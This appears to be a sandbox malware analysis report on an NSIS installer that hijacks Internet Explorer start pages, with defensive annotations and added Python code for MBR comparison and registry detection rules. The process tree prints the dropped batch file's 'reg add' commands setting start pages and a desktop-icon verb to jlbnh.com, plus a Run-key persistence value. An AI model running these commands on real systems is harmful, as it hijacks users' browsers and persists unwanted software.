Analysis
max time kernel: 135s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 03-10-2022 11:48
Static task: static1
Behavioral task: behavioral1
  Sample: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
  Resource: win7-20220812-en
Behavioral task: behavioral2
  Sample: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
  Resource: win10v2004-20220812-en
The signatures, process tree and dropped files below are from behavioral2, the win10v2004-20220812-en run named in the platform line.
General
Target: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
Size: 281KB
MD5: 4885173ebfa2267b9906d45bc6a2d2e0
SHA1: 38687ac8894e2401315c6626ec57a3d0fcae8b9e
SHA256: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795
SHA512: e398c05009f16e66a6425f924e5b82dd2f3e31be44fe2564b444ff3f8e8f65bb567a458d759df57bb91e373449b6ae6a2adf841ee33918218d9d7505cb6cd5cf
SSDEEP: 6144:Te34l9w0oHtBuAbJ8zk2OXp8TqPcv8h4SKEumqQI:0HSjzxgpiqP1/KEnqQI
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Reads the country code configured under HKCU\Control Panel\International\Geo\Nation, a common geofence check used to decide whether to run at all in a given locale. This is a registry read, not a write: it shows up in a sandbox API trace, but Sysmon only logs key creation and value writes (Event IDs 12/13), so it is not a usable host-telemetry indicator on its own.
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe (PID 4116)
description | ioc
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
Loads dropped DLL (6 IoCs)
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
pid | process
4116 | e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe (6 load events)
Four distinct DLLs are dropped under C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\ (Md5dll.dll, System.dll, bind.dll, xID.dll; see Downloads), two of them twice, matching the six load events. An ns*.tmp directory containing System.dll is the plugin-extraction layout of an NSIS installer, so the sample is best read as an installer package rather than a hand-written dropper.
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
description | ioc
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shandian = "C:\\Program Files (x86)\\shandian\\shandian.exe"
The value name and its target reuse the "shandian" name of the dropped Program Files (x86)\shandian directory. Note that shandian.exe itself does not appear among the file-creation IoCs in this report (only home.bat, config.ini and the icons do), so check on a live host whether the Run target actually exists before treating this as working persistence.
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate installed software. No IoC was recorded for this signature.
Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)
Bootkits write to the MBR to gain persistence below the operating system. What the report actually records is a handle to \??\PhysicalDrive0 opened with write access by the sample; it shows no write event and no sector contents, so this does not by itself prove that the boot sector was changed. Read the first 512 bytes of the disk after execution and compare the boot code and partition table against a clean baseline before calling this a bootkit.
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
description | ioc
File opened for modification | \??\PhysicalDrive0
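One way to turn that caveat into a check, as an added example that is not part of the sandbox report or of the sample: parse a 512-byte MBR, hash the boot code separately from the partition table, and diff the sector read after execution against a clean baseline. The sector bytes below are constructed (a stub modelled on the standard Windows MBR prologue plus a two-partition table) so the block runs offline; on a real host the bytes come from reading the first sector of \\.\PhysicalDrive0 from an elevated prompt, which the read_first_sector helper does. The build_mbr helper exists only to make the test data.

```python
"""Verify whether an MBR was actually changed: parse the first sector, hash the
boot code separately from the partition table, diff against a clean baseline.
Added example, not part of the sandbox report."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440           # bytes 0..439: boot code
DISK_SIG_OFF = 440            # 4-byte disk signature (then 2 reserved bytes)
PART_TABLE_OFF = 446          # four 16-byte partition entries
BOOT_SIGNATURE = b"\x55\xaa"  # bytes 510..511
PART_ENTRY = "<B3sB3sII"      # status, CHS start, type, CHS end, LBA start, sector count


def parse_mbr(sector):
    """Split a 512-byte MBR into boot-code hash, disk signature and partition table."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(sector)}")
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature: not a valid MBR")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(
            PART_ENTRY, sector, PART_TABLE_OFF + 16 * i)
        if ptype != 0:  # type 0 marks an unused slot
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba, "sectors": count})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, DISK_SIG_OFF)[0],
        "partitions": partitions,
    }


def diff_mbr(baseline, current):
    """Name what changed between a known-good sector and the one read after execution.
    A bootkit typically replaces the boot code and leaves the table intact, so the
    two are compared separately instead of hashing the whole sector."""
    b, c = parse_mbr(baseline), parse_mbr(current)
    findings = []
    if b["boot_code_sha256"] != c["boot_code_sha256"]:
        findings.append("boot code changed")
    if b["disk_signature"] != c["disk_signature"]:
        findings.append("disk signature changed")
    if b["partitions"] != c["partitions"]:
        findings.append("partition table changed")
    return findings


def read_first_sector(device=r"\\.\PhysicalDrive0"):
    """Read the live MBR. Needs an elevated prompt on Windows; unbuffered so the
    read is exactly one sector, which raw device handles require."""
    with open(device, "rb", buffering=0) as f:
        return f.read(SECTOR_SIZE)


def build_mbr(boot_code, disk_signature, partitions):
    """Assemble a sector from its parts (used here only to construct test data)."""
    if len(boot_code) > BOOT_CODE_LEN:
        raise ValueError("boot code too long")
    sector = bytearray(SECTOR_SIZE)
    sector[:BOOT_CODE_LEN] = boot_code.ljust(BOOT_CODE_LEN, b"\x00")
    struct.pack_into("<I", sector, DISK_SIG_OFF, disk_signature)
    for i, (bootable, ptype, lba, count) in enumerate(partitions):
        struct.pack_into(PART_ENTRY, sector, PART_TABLE_OFF + 16 * i,
                         0x80 if bootable else 0x00, b"\xfe\xff\xff",
                         ptype, b"\xfe\xff\xff", lba, count)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


# Constructed baseline (not taken from the sample): a stub modelled on the standard
# Windows MBR prologue, a bootable 100 MiB system partition and an NTFS data partition.
CLEAN_BOOT_CODE = bytes.fromhex("33c08ed0bc007c8ec08ed8be007cbf0006b90002fcf3a450681c06cbfb")
PARTITIONS = [(True, 0x07, 2048, 204800), (False, 0x07, 206848, 41736192)]
CLEAN_MBR = build_mbr(CLEAN_BOOT_CODE, 0x1234ABCD, PARTITIONS)
# Constructed "after" sector: same table and signature, boot code swapped for a
# different stub, standing in for a bootkit loader that chains to the original.
TAMPERED_BOOT_CODE = bytes.fromhex("fa33c08ed0bc007cfbbe1a7ce83400eb")
TAMPERED_MBR = build_mbr(TAMPERED_BOOT_CODE, 0x1234ABCD, PARTITIONS)

if __name__ == "__main__":
    print(parse_mbr(CLEAN_MBR)["partitions"])
    print(diff_mbr(CLEAN_MBR, TAMPERED_MBR))
```

For a real investigation the baseline is a sector captured from the same image before detonation (or from a known-clean install of the same Windows build), and the comparison is run on the bytes returned by read_first_sector; a "boot code changed" finding with an unchanged table is the bootkit pattern, while a changed table with identical boot code usually points at legitimate partitioning activity.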
Drops file in Program Files directory (6 IoCs)
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe
description | ioc
File created | C:\Program Files (x86)\shandian\home.bat
File created | C:\Program Files (x86)\shandian\ico\360.ico
File created | C:\Program Files (x86)\shandian\ico\anquan.ico
File created | C:\Program Files (x86)\shandian\ico\ie.ico
File created | C:\Program Files (x86)\shandian\ico\taobao.ico
File opened for modification | C:\Program Files (x86)\shandian\config.ini
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage or optical drives. The sandbox's canned description calls this "likely ransomware behaviour", but nothing else in this report supports that reading: there is no mass file modification and no ransom note, and the only raw-device access recorded is the \??\PhysicalDrive0 handle. No IoC was recorded for this signature.
Modifies Internet Explorer settings (1 IoC)
Processes: reg.exe
description | ioc
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main
Modifies Internet Explorer start page (1 TTP, 1 IoC)
Processes: reg.exe
description | ioc
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://www.jlbnh.com/?tn 4"
The process tree shows the same URL also being written to HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\Start Page. That key is read as policy and takes precedence over the per-user preference, so a user resetting the home page from the browser's own settings will not clear it; remediation has to remove both values.
Modifies registry class (5 IoCs)
Processes: reg.exe
description | ioc
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage
{871C5380-42A0-1069-A2EA-08002B30309D} is the CLSID of the Internet Explorer desktop (namespace) icon; its shell\OpenHomePage\Command verb is what runs when that icon is opened, and the reg add in the process tree points it at iexplore.exe with the same jlbnh.com URL. Because the write came from the 32-bit reg.exe under SysWOW64, the registry redirector placed the keys under WOW6432Node, the 32-bit view of HKCR\CLSID; the 64-bit shell reads the native view, so on this x64 image the verb hijack is unlikely to take effect, while the HKCU Start Page changes do. On a 32-bit host the same batch file would land the verb in the view the shell actually uses.
Suspicious use of WriteProcessMemory (12 IoCs)
Processes: e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe, cmd.exe
description | pid | process | target process
PID 4116 wrote to memory of 344 (3 events) | 4116 | e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe | cmd.exe
PID 344 wrote to memory of 1060 (3 events) | 344 | cmd.exe | reg.exe
PID 344 wrote to memory of 2636 (3 events) | 344 | cmd.exe | reg.exe
PID 344 wrote to memory of 1672 (3 events) | 344 | cmd.exe | reg.exe
Every write goes from a parent to a child it has just created, matching the process tree below. This is the parent populating the new process's address space during CreateProcess, which the sandbox records as WriteProcessMemory; it is not injection into an unrelated process.
Processes
1. C:\Users\Admin\AppData\Local\Temp\e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe (PID 4116)
   "C:\Users\Admin\AppData\Local\Temp\e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe"
   - Checks computer location settings
   - Loads dropped DLL
   - Adds Run key to start application
   - Writes to the Master Boot Record (MBR)
   - Drops file in Program Files directory
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe (PID 344)
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\shandian\home.bat" "
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\reg.exe
         reg add "HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /t reg_expand_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.jlbnh.com/?tn 4" /f
         - Modifies registry class
      3. C:\Windows\SysWOW64\reg.exe
         reg add "HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com/?tn 4" /f
      3. C:\Windows\SysWOW64\reg.exe
         reg add "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com/?tn 4" /f
         - Modifies Internet Explorer settings
         - Modifies Internet Explorer start page
The three reg add commands are the contents of the dropped home.bat as executed. cmd.exe is requested as C:\Windows\system32\cmd.exe but runs from SysWOW64 because the 32-bit installer is subject to file-system redirection; the reg.exe children inherit the same 32-bit view, which is why the HKCR write above is recorded under WOW6432Node. The three reg.exe PIDs (1060, 2636, 1672) come from the WriteProcessMemory IoCs; the report does not say which command line belongs to which PID.
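The three registry changes that the tree above shows (the Run value set by the installer, the two Start Page writes, and the OpenHomePage verb under the IE desktop-icon CLSID) can be matched from endpoint telemetry. The following is an added example, not code from the report or from the sample: it normalises registry paths in the three spellings that appear around this sample (the sandbox's native \REGISTRY\... paths, Sysmon's HKU\S-1-5-..., and reg.exe's HKCU/HKCR aliases, with WOW6432Node detected and stripped) and runs three rules over constructed Sysmon-style Event ID 12/13 records built from the IoCs above. The RegEvent shape, the event list and the benign Explorer event are assumptions for the example; the SID, key paths, value names and data are the ones in the report.

```python
"""Registry-based detection for the changes this sample makes, run over
constructed Sysmon-style events. Added example, not part of the sandbox report."""
import re
from dataclasses import dataclass

# CLSID of the Internet Explorer desktop/namespace icon (taken from the report);
# its shell\OpenHomePage\Command verb is what the sample repoints at iexplore.exe.
IE_NAMESPACE_CLSID = "{871C5380-42A0-1069-A2EA-08002B30309D}"


@dataclass
class RegEvent:
    """One registry write in the shape Sysmon reports it (assumed shape for this example)."""
    event_id: int      # 12 = key created/deleted, 13 = value set
    process: str       # image of the writing process
    target: str        # key path (event 12) or key\value path (event 13)
    details: str = ""  # value data for event 13


def normalize(path):
    """Canonicalise a registry path and report whether it sits in the WOW6432Node view.

    Handles the sandbox's native \\REGISTRY\\USER\\<SID>\\... and \\REGISTRY\\MACHINE
    paths, Sysmon's HKU\\<SID>\\... and HKLM\\..., and reg.exe's HKCU/HKCR aliases.
    WOW6432Node is stripped for matching but reported separately, because a 32-bit
    writer (SysWOW64\\reg.exe here) lands there while the 64-bit shell reads the
    native view.
    """
    p = path.replace("/", "\\")
    p = re.sub(r"^\\REGISTRY\\USER\\S-1-5-[\d-]+(?=\\)", "HKCU", p, flags=re.I)
    p = re.sub(r"^\\REGISTRY\\MACHINE(?=\\)", "HKLM", p, flags=re.I)
    p = re.sub(r"^HKU\\S-1-5-[\d-]+(?=\\)", "HKCU", p, flags=re.I)
    p = re.sub(r"^HKEY_CURRENT_USER(?=\\)", "HKCU", p, flags=re.I)
    p = re.sub(r"^HKEY_CLASSES_ROOT(?=\\)", "HKCR", p, flags=re.I)
    p = re.sub(r"^HKLM\\SOFTWARE\\Classes(?=\\)", "HKCR", p, flags=re.I)
    wow64 = re.search(r"\\WOW6432Node\\", p, flags=re.I) is not None
    if wow64:
        p = re.sub(r"\\WOW6432Node\\", lambda m: "\\", p, flags=re.I)
    return p.lower(), wow64


# Rules, written against the canonical lower-case form produced by normalize().
RUN_VALUE = re.compile(r"^hkcu\\software\\microsoft\\windows\\currentversion\\run\\[^\\]+$")
IE_START_PAGE = re.compile(
    r"^hkcu\\software\\(policies\\)?microsoft\\internet explorer\\main\\start page$")
IE_ICON_VERB = re.compile(
    r"^hkcr\\clsid\\" + re.escape(IE_NAMESPACE_CLSID.lower())
    + r"\\shell\\openhomepage\\command(\\.*)?$")


def run_rules(events):
    """Return (rule_name, evidence) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        key, wow64 = normalize(ev.target)
        view = "32-bit view (WOW6432Node)" if wow64 else "native view"
        if ev.event_id == 13 and RUN_VALUE.match(key):
            hits.append(("run_key_persistence", f"{ev.process} set {key} = {ev.details}"))
        if ev.event_id == 13 and IE_START_PAGE.match(key):
            hits.append(("ie_start_page_hijack", f"{ev.process} set {key} = {ev.details}"))
        if IE_ICON_VERB.match(key):
            hits.append(("ie_desktop_icon_verb_hijack", f"{ev.process} touched {key} in {view}"))
    return hits


# Constructed events mirroring the IoCs in the report (SID, paths and data copied from it).
SID = "S-1-5-21-2295526160-1155304984-640977766-1000"
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\e5d0baf3949f0d40395bdc947fc1e633fad3d73a6bdf8f384e0fd91bd4e82795.exe"
REG = r"C:\Windows\SysWOW64\reg.exe"
SAMPLE_EVENTS = [
    RegEvent(12, SAMPLE, rf"\REGISTRY\USER\{SID}\Software\Microsoft\Windows\CurrentVersion\Run"),
    RegEvent(13, SAMPLE, rf"\REGISTRY\USER\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shandian",
             r"C:\Program Files (x86)\shandian\shandian.exe"),
    RegEvent(13, REG, rf"HKU\{SID}\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\Start Page",
             "http://www.jlbnh.com/?tn 4"),
    RegEvent(13, REG, rf"\REGISTRY\USER\{SID}\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page",
             "http://www.jlbnh.com/?tn 4"),
    RegEvent(12, REG, r"\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID"
             r"\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"),
    # Constructed benign noise that must not fire: Explorer toggling a folder view option.
    RegEvent(13, r"C:\Windows\explorer.exe",
             rf"HKU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1"),
]

if __name__ == "__main__":
    for rule, evidence in run_rules(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

The Run-key rule fires on every new Run value and is deliberately broad; in production it is paired with an allow-list of known installers or a check that the target binary is signed. The Start Page rule covers the Policies key as well as the per-user one, since the batch file writes both, and the verb rule reports which registry view was written so an analyst can tell whether the hijack can actually be reached by the 64-bit shell.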
Network
Downloads
C:\Program Files (x86)\shandian\home.bat
Filesize: 703B
MD5: 9b86748bf8bcfc00712942d6285d49a2
SHA1: 06a20159bdb81e5501e7c65f2e8c75b142916090
SHA256: 07943cb2547088ed5ce1b349010d47f6b98b0a52e2aa9de6ae8fee98929b2753
SHA512: 34d3f5a659a69bfdc4b6df04c09a14d70b3342ab3023aebc8d5b67aa389b47ea01bafab569da3ba396e09d9a08e5a1bc66611e13b0c329e7bb6fa96c0ae643a9

C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\Md5dll.dll (listed twice in the report)
Filesize: 8KB
MD5: a7d710e78711d5ab90e4792763241754
SHA1: f31cecd926c5d497aba163a17b75975ec34beb13
SHA256: 9b05dd603f13c196f3f21c43f48834208fed2294f7090fcd1334931014611fb2
SHA512: f0ca2d6f9a8aeac84ef8b051154a041adffc46e3e9aced142e9c7bf5f7272b047e1db421d38cb2d9182d7442bee3dd806618b019ec042a23ae0e71671d2943c0

C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\System.dll
Filesize: 11KB
MD5: 00a0194c20ee912257df53bfe258ee4a
SHA1: d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256: dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA512: 3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\bind.dll
Filesize: 71KB
MD5: e2b78c96162ad8c36a623e6a4ba1c216
SHA1: 768b7bd184f2424099b964b2c9b68ef7fc8792dd
SHA256: ac615795d598b1c07aecd00e877c89abf71caa4d7d479cfab2d847f238f599cf
SHA512: f1d4cc27d44ecc7c5ef178972504637f42326e573a58fac2d918160a267e51b6123d627f324ce952e748242f5b13e4760089fc16d221229a93854124aa405fac

C:\Users\Admin\AppData\Local\Temp\nsv717C.tmp\xID.dll (listed twice in the report)
Filesize: 9KB
MD5: 3a5ed71aa9c6846d95d57235c4c443d7
SHA1: 08156d29bed654f8f8d7f46ddbce84d22d4710cf
SHA256: 5e3fa4d610cb2d80ed9991cb2562bd70c5b4d49dbcf4e42a1017c59eedbe28a4
SHA512: 5cdb5059020c20a83f230ae2d75bfb6fd69a03418ba6407336db9f0c653fea1e8f4a51400812da81a8bde2f6e4d95fd80e29eb462e818ddbd881789c00d5d1d1

Memory mapping dumps (PIDs as in the WriteProcessMemory IoCs):
memory/344-138-0x0000000000000000-mapping.dmp (cmd.exe, PID 344)
memory/1060-140-0x0000000000000000-mapping.dmp (reg.exe, PID 1060)
memory/1672-142-0x0000000000000000-mapping.dmp (reg.exe, PID 1672)
memory/2636-141-0x0000000000000000-mapping.dmp (reg.exe, PID 2636)